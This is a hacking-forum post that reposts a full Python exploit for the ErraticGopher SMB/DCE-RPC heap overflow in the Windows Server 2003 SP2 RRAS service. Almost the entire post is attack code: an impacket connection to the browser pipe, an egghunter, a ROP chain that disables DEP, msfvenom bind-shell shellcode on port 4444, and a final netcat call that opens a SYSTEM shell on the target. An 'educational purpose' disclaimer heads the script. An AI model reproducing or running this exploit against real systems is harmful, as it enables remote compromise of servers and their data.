搜索
查看: 370|回复: 0

WIN 2003 SP2 - SMB Remote Code Execution (ERRATICGOPHER) Exploit

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-6-11 19:36:18 | 显示全部楼层 |阅读模式
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. ##################################################################################
  4. #   By Victor Portal (vportal) for educational porpouse only     
  5. ##################################################################################
  6. #   This exploit is the python version of the ErraticGopher exploit probably     #
  7. #   with some modifications. ErraticGopher exploits a memory corruption          #
  8. #   (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet.       #
  9. #   Because the Magic bytes, the application redirects the execution to the      #
  10. #   iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy        #
  11. #   all te injected stub from the heap to the stack, overwritten a return        #
  12. #   address as well as the SEH handler stored in the Stack, being possible       #
  13. #   to control the execution flow to disable DEP and jump to the shellcode       #
  14. #   as SYSTEM user.                                                              #
  15. ##################################################################################
  16. #The exploit only works if target has the RRAS service enabled
  17. #Tested on Windows Server 2003 SP2
  18.   
  19. import struct
  20. import sys
  21. import time
  22. import os
  23.   
  24. from threading import Thread   
  25.                                  
  26. from impacket import smb
  27. from impacket import uuid
  28. from impacket import dcerpc
  29. from impacket.dcerpc.v5 import transport
  30.                   
  31. target = sys.argv[1]
  32.   
  33. print '[-]Initiating connection'
  34. trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
  35. trans.connect()
  36.   
  37. print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
  38. dce = trans.DCERPC_class(trans)
  39. #RRAS DCE-RPC CALL
  40. dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))
  41.   
  42. egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
  43. egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
  44.   
  45. #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
  46. buf =  ""
  47. buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
  48. buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
  49. buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
  50. buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
  51. buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
  52. buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
  53. buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
  54. buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
  55. buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
  56. buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
  57. buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
  58. buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
  59. buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
  60. buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
  61. buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
  62. buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
  63. buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
  64. buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
  65. buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
  66. buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
  67. buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
  68. buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
  69. buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
  70. buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
  71. buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
  72. buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
  73. buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
  74. buf += "\xc4\x25\x3d\xe9"
  75.   
  76. #NX disable routine for Windows Server 2003 SP2
  77. rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll
  78. rop += "\x45"*16
  79. rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll
  80. rop += "\x5d\x7a\x81\x7c" #ret 20
  81. rop += "\x71\x42\x38\x77" #jmp esp
  82. rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll
  83. rop += "\x90"*2 + egghunter + "\x90"*42
  84. rop += "\x17\xf5\x83\x7c" #Disable NX routine
  85. rop += "\x90"*4
  86.   
  87. stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes
  88. stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))
  89. stub += "\x12" #Magic byte
  90. stub += "\x46"*522
  91. stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes
  92.   
  93.   
  94. dce.call(0x1d, stub)   #0x1d MIBEntryGet (vulnerable function)
  95. print "[-]Exploit sent to target successfully..."
  96.   
  97. print "Waiting for shell..."
  98. time.sleep(5)
  99. os.system("nc " + target + " 4444")

  100. #  0day.today [2017-04-26]  #
复制代码


过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表